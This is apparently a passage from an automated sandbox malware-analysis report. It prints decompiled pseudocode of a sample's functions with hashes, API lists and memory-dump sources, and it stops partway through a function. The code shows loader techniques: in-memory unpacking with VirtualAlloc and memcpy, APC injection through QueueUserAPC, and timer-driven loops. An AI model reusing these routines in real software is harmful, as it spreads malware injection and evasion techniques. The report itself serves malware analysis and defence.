                                                                                                                                                                                                                                                            • Opcode ID: 9c1fe0525a08506dfdc298877037b73419d2130b65a5478e0a5c67b1dae83866
                                                                                                                                                                                                                                                            • Instruction ID: accbce298cfe7ce6b91fde8b1d8271492475c46a7449ebabda9ab7cee952884c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c1fe0525a08506dfdc298877037b73419d2130b65a5478e0a5c67b1dae83866
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5913971900204EFEB11EFA8DCA8AAE7BF9EF08314F144954E908D7260DB79ED51DB61
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                                            			E00401000(void* __edi, long _a4) {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				struct _SYSTEMTIME _v24;
                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                                            				long _t30;
                                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                                            				long _t40;
                                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                            				intOrPtr* _t65;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t25 = E00401146();
                                                                                                                                                                                                                                                            				_v8 = _t25;
                                                                                                                                                                                                                                                            				if(_t25 != 0) {
                                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                            					GetSystemTime( &_v24);
                                                                                                                                                                                                                                                            					_t27 = SwitchToThread();
                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                            					_t53 = 9;
                                                                                                                                                                                                                                                            					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
                                                                                                                                                                                                                                                            					_t30 = E004015A5(__edi, _t61); // executed
                                                                                                                                                                                                                                                            					_v8 = _t30;
                                                                                                                                                                                                                                                            					Sleep(_t61 << 5); // executed
                                                                                                                                                                                                                                                            					_t31 = _v8;
                                                                                                                                                                                                                                                            				} while (_t31 == 0xc);
                                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                                            					return _t31;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                                            					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, 0); // executed
                                                                                                                                                                                                                                                            					_t64 = _t32;
                                                                                                                                                                                                                                                            					if(_t64 == 0) {
                                                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                                                            						_v8 = GetLastError();
                                                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                                                            						_t31 = _v8;
                                                                                                                                                                                                                                                            						if(_t31 == 0xffffffff) {
                                                                                                                                                                                                                                                            							_t31 = GetLastError();
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t35 = QueueUserAPC(E00401936, _t64,  &_v48); // executed
                                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                                            						_t40 = GetLastError();
                                                                                                                                                                                                                                                            						_a4 = _t40;
                                                                                                                                                                                                                                                            						TerminateThread(_t64, _t40);
                                                                                                                                                                                                                                                            						CloseHandle(_t64);
                                                                                                                                                                                                                                                            						_t64 = 0;
                                                                                                                                                                                                                                                            						SetLastError(_a4);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_t64 == 0) {
                                                                                                                                                                                                                                                            						goto L18;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t36 = WaitForSingleObject(_t64, 0xffffffff);
                                                                                                                                                                                                                                                            						_v8 = _t36;
                                                                                                                                                                                                                                                            						if(_t36 == 0) {
                                                                                                                                                                                                                                                            							GetExitCodeThread(_t64,  &_v8);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						CloseHandle(_t64);
                                                                                                                                                                                                                                                            						goto L19;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				if(E0040126C(_t53,  &_a4) != 0) {
                                                                                                                                                                                                                                                            					 *0x404138 = 0;
                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t65 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                            				_t45 =  *_t65(_a4, 0, 0); // executed
                                                                                                                                                                                                                                                            				_t58 = _t45;
                                                                                                                                                                                                                                                            				if(_t58 == 0) {
                                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                                            					 *0x404138 = _a4;
                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t14 = _t58 + 2; // 0x2
                                                                                                                                                                                                                                                            				_t48 = E004017A6(_t58 + _t14);
                                                                                                                                                                                                                                                            				 *0x404138 = _t48;
                                                                                                                                                                                                                                                            				if(_t48 == 0) {
                                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				 *_t65(_a4, _t48, _t58); // executed
                                                                                                                                                                                                                                                            				E00401590(_a4);
                                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                                            0x00401007
                                                                                                                                                                                                                                                            0x00401010
                                                                                                                                                                                                                                                            0x00401013
                                                                                                                                                                                                                                                            0x00401143
                                                                                                                                                                                                                                                            0x00401143
                                                                                                                                                                                                                                                            0x0040101a
                                                                                                                                                                                                                                                            0x0040101e
                                                                                                                                                                                                                                                            0x00401024
                                                                                                                                                                                                                                                            0x00401032
                                                                                                                                                                                                                                                            0x00401033
                                                                                                                                                                                                                                                            0x00401036
                                                                                                                                                                                                                                                            0x00401039
                                                                                                                                                                                                                                                            0x00401042
                                                                                                                                                                                                                                                            0x00401045
                                                                                                                                                                                                                                                            0x0040104b
                                                                                                                                                                                                                                                            0x0040104e
                                                                                                                                                                                                                                                            0x00401055
                                                                                                                                                                                                                                                            0x00401140
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401140
                                                                                                                                                                                                                                                            0x0040105e
                                                                                                                                                                                                                                                            0x0040105f
                                                                                                                                                                                                                                                            0x004010b5
                                                                                                                                                                                                                                                            0x004010c5
                                                                                                                                                                                                                                                            0x004010cb
                                                                                                                                                                                                                                                            0x004010d5
                                                                                                                                                                                                                                                            0x00401130
                                                                                                                                                                                                                                                            0x00401132
                                                                                                                                                                                                                                                            0x00401135
                                                                                                                                                                                                                                                            0x00401135
                                                                                                                                                                                                                                                            0x0040113c
                                                                                                                                                                                                                                                            0x0040113e
                                                                                                                                                                                                                                                            0x0040113e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040113c
                                                                                                                                                                                                                                                            0x004010e1
                                                                                                                                                                                                                                                            0x004010ef
                                                                                                                                                                                                                                                            0x004010f1
                                                                                                                                                                                                                                                            0x004010f5
                                                                                                                                                                                                                                                            0x004010f8
                                                                                                                                                                                                                                                            0x004010ff
                                                                                                                                                                                                                                                            0x00401104
                                                                                                                                                                                                                                                            0x00401106
                                                                                                                                                                                                                                                            0x00401106
                                                                                                                                                                                                                                                            0x0040110e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401110
                                                                                                                                                                                                                                                            0x00401113
                                                                                                                                                                                                                                                            0x0040111b
                                                                                                                                                                                                                                                            0x0040111e
                                                                                                                                                                                                                                                            0x00401125
                                                                                                                                                                                                                                                            0x00401125
                                                                                                                                                                                                                                                            0x0040112c
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0040112c
                                                                                                                                                                                                                                                            0x0040110e
                                                                                                                                                                                                                                                            0x0040106c
                                                                                                                                                                                                                                                            0x004010af
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004010af
                                                                                                                                                                                                                                                            0x0040106e
                                                                                                                                                                                                                                                            0x00401079
                                                                                                                                                                                                                                                            0x0040107b
                                                                                                                                                                                                                                                            0x0040107f
                                                                                                                                                                                                                                                            0x004010a5
                                                                                                                                                                                                                                                            0x004010a8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004010a8
                                                                                                                                                                                                                                                            0x00401081
                                                                                                                                                                                                                                                            0x00401086
                                                                                                                                                                                                                                                            0x0040108d
                                                                                                                                                                                                                                                            0x00401092
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401099
                                                                                                                                                                                                                                                            0x0040109e
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401146: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0040100C), ref: 00401155
                                                                                                                                                                                                                                                              • Part of subcall function 00401146: GetVersion.KERNEL32(?,0040100C), ref: 00401164
                                                                                                                                                                                                                                                              • Part of subcall function 00401146: GetCurrentProcessId.KERNEL32(?,0040100C), ref: 0040117B
                                                                                                                                                                                                                                                              • Part of subcall function 00401146: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,0040100C), ref: 00401194
                                                                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0040101E
                                                                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401024
                                                                                                                                                                                                                                                              • Part of subcall function 004015A5: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,0040103E,?,00000000,?,?,?,?,?,?,?,0040103E), ref: 004015FB
                                                                                                                                                                                                                                                              • Part of subcall function 004015A5: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,0040103E,00000000), ref: 0040168D
                                                                                                                                                                                                                                                              • Part of subcall function 004015A5: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,0040103E), ref: 004016A8
                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000,00000000), ref: 00401045
                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNELBASE ref: 00401079
                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNELBASE ref: 00401099
                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000), ref: 004010C5
                                                                                                                                                                                                                                                            • QueueUserAPC.KERNELBASE(00401936,00000000,?), ref: 004010E1
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004010F1
                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,00000000), ref: 004010F8
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004010FF
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 00401106
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401113
                                                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401125
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040112C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401130
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2478182988-0
                                                                                                                                                                                                                                                            • Opcode ID: 3939edb4b126119152778c5f3a5e3cd4043561bad993e151311eaba4de6d9ccb
                                                                                                                                                                                                                                                            • Instruction ID: a33b5aa527d17de1f529f97a9b4b4f3e9e18afc8cd0e3492a2a0bf6f8a999015
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3939edb4b126119152778c5f3a5e3cd4043561bad993e151311eaba4de6d9ccb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07319271901118BFDB11AFB5DD889AF7BACEB483957104137F605F62A4D7388E808BA9
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                            			E048786DE(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                            				struct %anon52 _v8;
                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                            				void _v88;
                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                            				struct %anon52 _t46;
                                                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                                                            				long _t53;
                                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                                            				struct %anon52 _t60;
                                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                                            				void** _t78;
                                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t73 = __edx;
                                                                                                                                                                                                                                                            				_v92 = 0;
                                                                                                                                                                                                                                                            				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                                            				_v44 = _t46;
                                                                                                                                                                                                                                                            				if(_t46 == 0) {
                                                                                                                                                                                                                                                            					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_push(0xffffffff);
                                                                                                                                                                                                                                                            					_push(0xff676980);
                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                            					_push( *0x487d240);
                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                            					L0487B078();
                                                                                                                                                                                                                                                            					_v36.LowPart = _t46;
                                                                                                                                                                                                                                                            					_v32 = _t73;
                                                                                                                                                                                                                                                            					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                                            					_t51 =  *0x487d26c; // 0x2c4
                                                                                                                                                                                                                                                            					_v40 = _t51;
                                                                                                                                                                                                                                                            					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                                            					_v8.LowPart = _t53;
                                                                                                                                                                                                                                                            					if(_t53 == 0) {
                                                                                                                                                                                                                                                            						if(_a8 != 0) {
                                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                                            							 *0x487d24c = 5;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t68 = E04879D72(); // executed
                                                                                                                                                                                                                                                            							if(_t68 != 0) {
                                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                                            						if(_v12 == 1 && ( *0x487d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                            							_v12 = 2;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t71 = _v12;
                                                                                                                                                                                                                                                            						_t58 = _t71 << 4;
                                                                                                                                                                                                                                                            						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                                            						_t72 = _t71 + 1;
                                                                                                                                                                                                                                                            						_v24 = _t71 + 1;
                                                                                                                                                                                                                                                            						_t60 = E048785F4(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                                            						_v8.LowPart = _t60;
                                                                                                                                                                                                                                                            						if(_t60 != 0) {
                                                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t65 = _v24;
                                                                                                                                                                                                                                                            						_t90 = _t65 - 3;
                                                                                                                                                                                                                                                            						_v12 = _t65;
                                                                                                                                                                                                                                                            						if(_t65 != 3) {
                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_v8.LowPart = E048748CC(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                                            						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                                            						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                                            							_push(0xffffffff);
                                                                                                                                                                                                                                                            							_push(0xff676980);
                                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                                            							_push( *0x487d244);
                                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							__eflags =  *0x487d248; // 0x0
                                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                            								_t60 = E04879E85();
                                                                                                                                                                                                                                                            								_push(0xffffffff);
                                                                                                                                                                                                                                                            								_push(0xdc3cba00);
                                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                                            								_push( *0x487d248);
                                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                                            								L0487B078();
                                                                                                                                                                                                                                                            								_v36.LowPart = _t60;
                                                                                                                                                                                                                                                            								_v32 = _t76;
                                                                                                                                                                                                                                                            								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                            								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                                            								__eflags = _t64;
                                                                                                                                                                                                                                                            								_v8.LowPart = _t64;
                                                                                                                                                                                                                                                            								if(_t64 == 0) {
                                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						L25:
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                            					_t78 =  &_v92;
                                                                                                                                                                                                                                                            					_t70 = 3;
                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                            						_t54 =  *_t78;
                                                                                                                                                                                                                                                            						if(_t54 != 0) {
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _t54);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                                            						_t70 = _t70 - 1;
                                                                                                                                                                                                                                                            					} while (_t70 != 0);
                                                                                                                                                                                                                                                            					CloseHandle(_v44);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                            				goto L25;
                                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                                            0x048786de
                                                                                                                                                                                                                                                            0x048786f0
                                                                                                                                                                                                                                                            0x048786f3
                                                                                                                                                                                                                                                            0x048786ff
                                                                                                                                                                                                                                                            0x04878707
                                                                                                                                                                                                                                                            0x0487870a
                                                                                                                                                                                                                                                            0x04878871
                                                                                                                                                                                                                                                            0x04878710
                                                                                                                                                                                                                                                            0x04878710
                                                                                                                                                                                                                                                            0x04878712
                                                                                                                                                                                                                                                            0x04878717
                                                                                                                                                                                                                                                            0x04878718
                                                                                                                                                                                                                                                            0x0487871e
                                                                                                                                                                                                                                                            0x04878721
                                                                                                                                                                                                                                                            0x04878724
                                                                                                                                                                                                                                                            0x04878732
                                                                                                                                                                                                                                                            0x0487873d
                                                                                                                                                                                                                                                            0x04878740
                                                                                                                                                                                                                                                            0x04878742
                                                                                                                                                                                                                                                            0x0487874f
                                                                                                                                                                                                                                                            0x04878759
                                                                                                                                                                                                                                                            0x0487875d
                                                                                                                                                                                                                                                            0x04878760
                                                                                                                                                                                                                                                            0x04878765
                                                                                                                                                                                                                                                            0x04878770
                                                                                                                                                                                                                                                            0x04878770
                                                                                                                                                                                                                                                            0x04878767
                                                                                                                                                                                                                                                            0x04878767
                                                                                                                                                                                                                                                            0x0487876e
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487876e
                                                                                                                                                                                                                                                            0x0487877a
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487877d
                                                                                                                                                                                                                                                            0x04878781
                                                                                                                                                                                                                                                            0x0487878c
                                                                                                                                                                                                                                                            0x0487878c
                                                                                                                                                                                                                                                            0x04878793
                                                                                                                                                                                                                                                            0x0487879c
                                                                                                                                                                                                                                                            0x048787a3
                                                                                                                                                                                                                                                            0x048787ac
                                                                                                                                                                                                                                                            0x048787af
                                                                                                                                                                                                                                                            0x048787b2
                                                                                                                                                                                                                                                            0x048787b9
                                                                                                                                                                                                                                                            0x048787bc
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048787be
                                                                                                                                                                                                                                                            0x048787c1
                                                                                                                                                                                                                                                            0x048787c4
                                                                                                                                                                                                                                                            0x048787c7
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048787c9
                                                                                                                                                                                                                                                            0x048787d8
                                                                                                                                                                                                                                                            0x048787d8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878806
                                                                                                                                                                                                                                                            0x04878806
                                                                                                                                                                                                                                                            0x0487880b
                                                                                                                                                                                                                                                            0x0487882a
                                                                                                                                                                                                                                                            0x0487882c
                                                                                                                                                                                                                                                            0x04878831
                                                                                                                                                                                                                                                            0x04878832
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487880d
                                                                                                                                                                                                                                                            0x0487880d
                                                                                                                                                                                                                                                            0x04878813
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878815
                                                                                                                                                                                                                                                            0x04878815
                                                                                                                                                                                                                                                            0x0487881a
                                                                                                                                                                                                                                                            0x0487881c
                                                                                                                                                                                                                                                            0x04878821
                                                                                                                                                                                                                                                            0x04878822
                                                                                                                                                                                                                                                            0x04878838
                                                                                                                                                                                                                                                            0x04878838
                                                                                                                                                                                                                                                            0x04878840
                                                                                                                                                                                                                                                            0x0487884b
                                                                                                                                                                                                                                                            0x0487884e
                                                                                                                                                                                                                                                            0x04878859
                                                                                                                                                                                                                                                            0x0487885b
                                                                                                                                                                                                                                                            0x0487885d
                                                                                                                                                                                                                                                            0x04878860
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878866
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04878866
                                                                                                                                                                                                                                                            0x04878860
                                                                                                                                                                                                                                                            0x04878813
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x0487880b
                                                                                                                                                                                                                                                            0x048787db
                                                                                                                                                                                                                                                            0x048787dd
                                                                                                                                                                                                                                                            0x048787e0
                                                                                                                                                                                                                                                            0x048787e1
                                                                                                                                                                                                                                                            0x048787e1
                                                                                                                                                                                                                                                            0x048787e5
                                                                                                                                                                                                                                                            0x048787ef
                                                                                                                                                                                                                                                            0x048787ef
                                                                                                                                                                                                                                                            0x048787f5
                                                                                                                                                                                                                                                            0x048787f8
                                                                                                                                                                                                                                                            0x048787f8
                                                                                                                                                                                                                                                            0x048787fe
                                                                                                                                                                                                                                                            0x048787fe
                                                                                                                                                                                                                                                            0x0487887b
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 048786F3
                                                                                                                                                                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 048786FF
                                                                                                                                                                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04878724
                                                                                                                                                                                                                                                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04878740
                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04878759
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 048787EF
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 048787FE
                                                                                                                                                                                                                                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04878838
                                                                                                                                                                                                                                                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,048791D2,?), ref: 0487884E
                                                                                                                                                                                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04878859
                                                                                                                                                                                                                                                              • Part of subcall function 04879D72: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05259378,00000000,?,73BCF710,00000000,73BCF730), ref: 04879DC1
                                                                                                                                                                                                                                                              • Part of subcall function 04879D72: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,052593B0,?,00000000,30314549,00000014,004F0053,0525936C), ref: 04879E5E
                                                                                                                                                                                                                                                              • Part of subcall function 04879D72: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0487876C), ref: 04879E70
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0487886B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3521023985-0
                                                                                                                                                                                                                                                            • Opcode ID: 30edbc92b377d5d9ffb245ce0138648dfd2cf6216a5590976ad2d163cb57b2ca
                                                                                                                                                                                                                                                            • Instruction ID: 0dad01870b536645f46858f5823e4cdc60281bb0e46bad526eefa2186f71d3c9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30edbc92b377d5d9ffb245ce0138648dfd2cf6216a5590976ad2d163cb57b2ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12516C71801229ABDF10EF99DC98DEEBFB8EF45364F144A16E511F2190D774EA40DBA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                                            			E04877F89(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				struct _FILETIME* _v12;
                                                                                                                                                                                                                                                            				short _v56;
                                                                                                                                                                                                                                                            				struct _FILETIME* _t12;
                                                                                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                            
